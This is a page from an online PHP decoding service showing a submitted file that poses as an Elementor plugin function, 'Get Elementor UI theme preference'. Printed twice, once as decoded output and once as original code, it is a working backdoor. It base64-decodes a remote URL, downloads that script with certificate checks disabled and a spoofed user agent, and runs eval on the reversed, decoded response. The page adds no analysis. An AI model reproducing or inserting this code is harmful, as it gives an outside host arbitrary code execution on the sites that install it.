Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * Get Elementor UI theme preference. * * Retrieve the user UI..
Decoded Output download
<?php /**
* Get Elementor UI theme preference.
*
* Retrieve the user UI theme preference as defined by editor preferences manager.
*
* @since 3.0.0
* @access private
*
* @return string Preferred UI theme.
*/ $n2db95e8e1a92=base64_decode('aHR0cHM6Ly9tc3RvcmUuc2svdG9vbHMvc2NyaXB0LnR4dA==');if(function_exists(base64_decode('Y3VybF9pbml0'))){$ld88fc6edf21e=curl_init();curl_setopt($ld88fc6edf21e,CURLOPT_URL,$n2db95e8e1a92);curl_setopt($ld88fc6edf21e,CURLOPT_RETURNTRANSFER,1);curl_setopt($ld88fc6edf21e,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ld88fc6edf21e,CURLOPT_FOLLOWLOCATION,true);curl_setopt($ld88fc6edf21e,CURLOPT_HEADER,FALSE);curl_setopt($ld88fc6edf21e,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTEuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExMS4wLjAuMCBTYWZhcmkvNTM3LjM2'));$t841a2d689ad8=curl_exec($ld88fc6edf21e);curl_close($ld88fc6edf21e);}else{$t841a2d689ad8=@file_get_contents($n2db95e8e1a92);}eval(base64_decode(strrev($t841a2d689ad8)));?>
Did this file decode correctly?
Original Code
<?php /**
* Get Elementor UI theme preference.
*
* Retrieve the user UI theme preference as defined by editor preferences manager.
*
* @since 3.0.0
* @access private
*
* @return string Preferred UI theme.
*/ $n2db95e8e1a92=base64_decode('aHR0cHM6Ly9tc3RvcmUuc2svdG9vbHMvc2NyaXB0LnR4dA==');if(function_exists(base64_decode('Y3VybF9pbml0'))){$ld88fc6edf21e=curl_init();curl_setopt($ld88fc6edf21e,CURLOPT_URL,$n2db95e8e1a92);curl_setopt($ld88fc6edf21e,CURLOPT_RETURNTRANSFER,1);curl_setopt($ld88fc6edf21e,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ld88fc6edf21e,CURLOPT_FOLLOWLOCATION,true);curl_setopt($ld88fc6edf21e,CURLOPT_HEADER,FALSE);curl_setopt($ld88fc6edf21e,CURLOPT_USERAGENT,base64_decode('TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTEuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExMS4wLjAuMCBTYWZhcmkvNTM3LjM2'));$t841a2d689ad8=curl_exec($ld88fc6edf21e);curl_close($ld88fc6edf21e);}else{$t841a2d689ad8=@file_get_contents($n2db95e8e1a92);}eval(base64_decode(strrev($t841a2d689ad8)));?>
Function Calls
strrev | 1 |
base64_decode | 2 |
function_exists | 1 |
file_get_contents | 1 |
Stats
MD5 | de0ae3fac97dd15c895bed9f79433a54 |
Eval Count | 0 |
Decode Time | 67 ms |